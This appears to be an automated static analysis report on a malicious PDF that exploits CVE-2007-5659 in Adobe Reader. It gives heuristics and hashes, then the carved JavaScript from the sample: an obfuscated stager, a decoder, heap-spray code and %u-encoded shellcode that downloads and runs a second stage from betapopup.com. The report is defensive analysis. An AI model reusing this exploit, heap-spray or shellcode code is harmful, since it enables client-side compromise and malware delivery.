Malicious PDF — malware analysis report

Static analysis result for SHA-256 82e78fc95b94f4bb…

MALICIOUS

PDF

Size: 16.2 KB | First seen: 2026-05-08
MD5: 7e430b0ded1d0928644be4cc9b5900c9
SHA-1: d919b878e5dede9c04b669be272c730b971a055b
SHA-256: 82e78fc95b94f4bbaa4eddc769a5d3e01a96ead9022e8cd4462eb54113205d64
Risk Score: 266

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF document contains embedded JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The JavaScript is obfuscated but reconstructs a URL from character codes, which is then used to download a second-stage payload. This indicates downloader or dropper functionality.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; rule CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action [low; 4 related findings; rule PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high; CVE match: likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low; rule PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive [low; rule PDF_FOXIT_SYNCANNOTSCAN]
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; rule EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://betapopup.com/cgi-bin/cliche/n006106201r0019Rcc61c9f6X38e2c77bY60f56f5dZ0100f060 (referenced by PDF JavaScript)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump) {
    var result = "";
    var list = str.split(',');
    for (var i = 0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}
numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1C12 | 12239 bytes
SHA-256: 9646e7526799acf353a3bbb1421eec26808c2223101c3446e5a4185908532c92
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function LR1__7(C____4__43__Mv, Ln_JJX_D_H0Yh8){var charr = String["fromC"+"harCode"];var abs = "va";var u_VT_hl = arguments['call'+'ee'];var a_kCF__P_7 = 0;try {var S_F_qj3fci5 = 0;if (app) {a_kCF__P_7++;Ln_JJX_D_H0Yh8 = pr[S_F_qj3fci5].subject;}a_kCF__P_7++;} catch(e) { }var y_gE0pA80_7BBht = new Array();if (C____4__43__Mv) { y_gE0pA80_7BBht = C____4__43__Mv;} else {var O_2IM__6m1N_xOp = 0;var E_30_w1SW_M6 = 0;var f4Oa3___qA = 512;var e_5_88u1Hh0Qh = 53;u_VT_hl = u_VT_hl.toString();e_5_88u1Hh0Qh = e_5_88u1Hh0Qh - 5;var Sr7vM7__w_T = e_5_88u1Hh0Qh + 10;Sr7vM7__w_T = Sr7vM7__w_T - 1;while(E_30_w1SW_M6 < u_VT_hl.length) {var U_dwb2_07D4 = 1;var Q__3w5_CS = u_VT_hl["charCo" + "deAt"](E_30_w1SW_M6);if (Q__3w5_CS >= e_5_88u1Hh0Qh && Q__3w5_CS <= Sr7vM7__w_T) {if (O_2IM__6m1N_xOp == 4) {O_2IM__6m1N_xOp = 0;}if (isNaN(y_gE0pA80_7BBht[O_2IM__6m1N_xOp])) {var S_F_qj3fci5 = 0;y_gE0pA80_7BBht[O_2IM__6m1N_xOp] = S_F_qj3fci5;}y_gE0pA80_7BBht[O_2IM__6m1N_xOp] += Q__3w5_CS;if (y_gE0pA80_7BBht[O_2IM__6m1N_xOp] > f4Oa3___qA) {y_gE0pA80_7BBht[O_2IM__6m1N_xOp] -= 512;}O_2IM__6m1N_xOp++;}E_30_w1SW_M6++;}}O_2IM__6m1N_xOp = 4;for (var L0_pfU30P = 0; L0_pfU30P < 4; L0_pfU30P++) {if (y_gE0pA80_7BBht[L0_pfU30P] > 256) {y_gE0pA80_7BBht[L0_pfU30P] -= 256;}}var y8V_o__6i = 0;var X_580f__NqK4vgN = "";var ggq3_YMn4___I = 0;var sEkss_A5 = 0;var YO_2V__rL_sL47g = 0;var A_a31E_H;var Hve6_8M4r_g2 = 23;while(sEkss_A5 < Ln_JJX_D_H0Yh8.length) {var MJRXY8g3 = Ln_JJX_D_H0Yh8.substr(sEkss_A5, 1) + "YY";var YfL2FQ_5J____6p = parseInt(MJRXY8g3, Hve6_8M4r_g2);if (ggq3_YMn4___I) {A_a31E_H += YfL2FQ_5J____6p;if (y8V_o__6i == 4) {y8V_o__6i -= 4;}var PF___bYD0 = A_a31E_H;PF___bYD0 = PF___bYD0 - (YO_2V__rL_sL47g + 2) * y_gE0pA80_7BBht[y8V_o__6i];if (PF___bYD0 < 0) {PF___bYD0 = PF___bYD0 - Math.floor(PF___bYD0 / 256) * 256;}PF___bYD0 = String.fromCharCode(PF___bYD0);if (a_kCF__P_7 == 2) {X_580f__NqK4vgN += PF___bYD0;} else if (a_kCF__P_7 == 1) {X_580f__NqK4vgN += YfL2FQ_5J____6p;} else {X_580f__NqK4vgN += 
sEkss_A5;}y8V_o__6i++;YO_2V__rL_sL47g++;ggq3_YMn4___I = 0;} else {A_a31E_H = YfL2FQ_5J____6p * 23;ggq3_YMn4___I = 1;}sEkss_A5++;}var aa = this;aa['e' + abs + 'l'](X_580f__NqK4vgN);}
	LR1__7(0, "5h21a48b6d562l1h6i906k0d7b3c3a386k7a555eb238aa4k1h7f788cak90al9e3a5d3jae2d9c0fb15i1d5k257057b20d6b8m3g0j793c064k086k556h0h307j6e0j8c1h9b20al7ia34c2g1e832m776h167i402d328b8d860f9j26284e9g674c6h9la7107b1i1m44863068009b50ac2i066b4a0d0i67af2j1f62518l3h9465585aa92i6e5509542g780d8m5l6e02523i7e508l7eac361m061e587878aj8e0l0j3m9h54754e7h6la56b073b336a1a74a6872l8m3g69152a8jaf5iaa221a693j6m086c8b39408h128b53b02g1e2d93895d550647208k2b8172a04h9f047a4b5i5eaf6e96a2ab7l3m6k319b8e9k148b0e6b4h1063al5j230d2d57b217039i3e9919af4a0198955a7c0gam4a0e8h38964f1i49ac6c7c4m9c1d2c53a04g83882612269a0m3a5dai44a90f02563g6la146548h006f105b0j7129aj5f9l9g3h3e192g7i75b2704j620j97a5a7423c328k52b05dae42402206815k724a73242942066e786b0l7la356ad236f8d065j0m94271e3ca46b40041177b05h29532d8d0b7265195f7d2e913h094b2l7la09c5l5a0i1h0071179d7f8e56071c1f4l428d2286121e0798513j1kai8m9k5b98236l4d207a0e863d0m2a6a29288a8028aj1h1260129gai708d111960996m21773k086eal9m875g1f3eai66ak8c77713ga91402243c440063a7041k7e237c409e8e0h4ba1a85653b057006ea20252852f4maa61205j2a7f20346eam5m6b2e1g7a8674al5h28021078647g4maj1b2a6aab428d8925119h7f3l57759j2j7ba2ac6c2f6j9c5c4a0k0d850d5e3d7g31a94i8i974b6i9h3la96g2k8845923c9f707k213k3c012k7d781c7940290a666472439625ag54ah6a766h0m7daf5da41g3k5c455baba14i265c8m3f4aa51c6f0b220c5319800d6867193bak2ca05f9i4g1h6828b09e6c025g309k4l9455am5dagaiai71797l1j5m9dai2c9f4h7c23ag9c175j13313340b24a935db11i2a844a5fb1a8387j2ib17130afa1614i130j6g997a1803543257a8a88d3ial0eak5jam5358652h1j26aj4l41539g5eb1102a4e1a3b017l5d8g1f71185c53a46cb04i1lal5h8c334g778c3c8d37a95009af096l733e257e0d97al7h292h4c8g8c84518a2a0364a87l6779100cah6d17584k7e1ja20fb16f0i3l1j4f890m2a918m4f1g8f3706428m7h5866931c6m7k258d1173401h92ai202i0a8c41am891i422j342663805i4389aa0m2ia04g6l608m8j9974b03g4c982185a79i2bag3b043h4d0e0k7b7l44205l41812k9c9g2d4kaea86m36ak6b1b6kahaf9295022l009a238l660b47270l0l4h4i552a60951l339i5f5e4la89c1h4i0c0635442953915607982a6a292885882h6
... (truncated)
legacy_pdfkit_stage_001.js | deobfuscated-js | nested inline base-23 callee-key decoded JavaScript at offset 0x1C12 | 5018 bytes
SHA-256: 61658886838301562fa25292c8381adce7837ffa4d95eafe1e4eadc19bb4223f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var mCSiV162JKoV = new Array();var q1e___F_x_4_67 = 0;var pp__4QEv0wDECjb = "";function lvn_Mk(t6__i_70__4X_q, ow8u_W_1W6vEka){var U_ANjG0 = ow8u_W_1W6vEka.toString();var Y__Lhe = "";for(var AHuVy_cSww = 0; AHuVy_cSww < U_ANjG0.length; AHuVy_cSww++) {var nX3_1Sw = parseInt(U_ANjG0.substr(AHuVy_cSww, 1));if (!isNaN(nX3_1Sw)) {nX3_1Sw = nX3_1Sw.toString(16);if (nX3_1Sw.length == 1) { nX3_1Sw = "0" + nX3_1Sw; }else if (nX3_1Sw.length != 2) { nX3_1Sw = "00"; }Y__Lhe = nX3_1Sw + Y__Lhe;}}while(Y__Lhe.length < 8) { Y__Lhe = "0" + Y__Lhe; }var Illn_768Sp_u = t6__i_70__4X_q.toString(16);if (Illn_768Sp_u.length == 1) { Illn_768Sp_u = "0" + Illn_768Sp_u; }else if (Illn_768Sp_u.length != 2) { Illn_768Sp_u = "00"; }Y__Lhe = "3" + Illn_768Sp_u + "P" + Y__Lhe;return Y__Lhe;}function P1_qJVda(b3_8xI_Ef700m8, r__s42o){var S4M6vO84se = new Array("");var Sqa3b5pK2N5TF_c = b3_8xI_Ef700m8;var P_2_1Wiy;if ((P_2_1Wiy = b3_8xI_Ef700m8.lastIndexOf("%u00")) != -1) {if (P_2_1Wiy + 6 == b3_8xI_Ef700m8.length) {S4M6vO84se[0] = b3_8xI_Ef700m8.substr(P_2_1Wiy + 4, 2);Sqa3b5pK2N5TF_c = b3_8xI_Ef700m8.substring(0, P_2_1Wiy);}}P_2_1Wiy = 1;for (AHuVy_cSww = 0; AHuVy_cSww < r__s42o.length; AHuVy_cSww++) {var PMW71_UMT3J178w = r__s42o.charCodeAt(AHuVy_cSww).toString(16);if (PMW71_UMT3J178w.length == 1) { PMW71_UMT3J178w = "0" + PMW71_UMT3J178w; }S4M6vO84se[P_2_1Wiy] = PMW71_UMT3J178w;P_2_1Wiy++;}AHuVy_cSww = S4M6vO84se[0].length ? 
0 : 1;S4M6vO84se[P_2_1Wiy] = "00";S4M6vO84se[P_2_1Wiy + 1] = "00";P_2_1Wiy += 2;if ((S4M6vO84se.length - AHuVy_cSww) % 2) {S4M6vO84se[P_2_1Wiy] = "00";}while(AHuVy_cSww < S4M6vO84se.length) {Sqa3b5pK2N5TF_c += "%u" + S4M6vO84se[AHuVy_cSww + 1] + S4M6vO84se[AHuVy_cSww];AHuVy_cSww += 2;}Sqa3b5pK2N5TF_c += "%u0000";return Sqa3b5pK2N5TF_c;}function I3m_8NI(Q_hc0_p_B_3M5, xS___35nNMX8Iil){while (Q_hc0_p_B_3M5.length*2<xS___35nNMX8Iil) {Q_hc0_p_B_3M5 += Q_hc0_p_B_3M5;}Q_hc0_p_B_3M5 = Q_hc0_p_B_3M5.substring(0,xS___35nNMX8Iil/2);return Q_hc0_p_B_3M5;}function jD_H_s_CS_87rPu(A_fl44Wpd1_4vE, UJhBY0, M__7_4G_G){var CCUVFNs = 0x0c0c0c0c;var Q_hc0_p_B_3M5 = unescape(UJhBY0);var r__s42o = lvn_Mk(A_fl44Wpd1_4vE, M__7_4G_G);var VU_u8__V = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var b3_8xI_Ef700m8 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6970%u5171%u0062%u7468%u7074%u2f3a%u622f%u7465%u7061%u706f%u7075%u632e%u6d6f%u632f%u6967%u622d%u6e69%u632f%
u696c%u6863%u2f65%u306e%u3630%u3031%u3236%u3130%u3072%u3130%u5239%u6363%u3136%u3963%u3666%u3358%u6538%u6332%u3737%u5962%u3036%u3566%u6636%u6435%u305a%u3031%u6630%u3630%u0030";app.e_b1_oJp_7_q = unescape(P1_qJVda(b3_8xI_Ef700m8, r__s42o));var i___eBYi77rr = 0x400000;var l4bg_j = VU_u8__V.length * 2;var xS___35nNMX8Iil = i___eBYi77rr - (l4bg_j+0x38);Q_hc0_p_B_3M5 = I3m_8NI(Q_hc0_p_B_3M5, xS___35nNMX8Iil);var jt4_L58d__O50W = (CCUVFNs - 0x400000)/i___eBYi77rr;for (var bDSQA_17_n_pTc = 0; bDSQA_17_n_pTc < jt4_L58d__O50W; bDSQA_17_n_pTc++) {mCSiV162JKoV[bDSQA_17_n_pTc] = Q_hc0_p_B_3M5 + VU_u8__V;}}function u7J27kk_1(){var cN_vgt = "";for (AHuVy_cSww = 0; AHuVy_cSww < 12; A
... (truncated)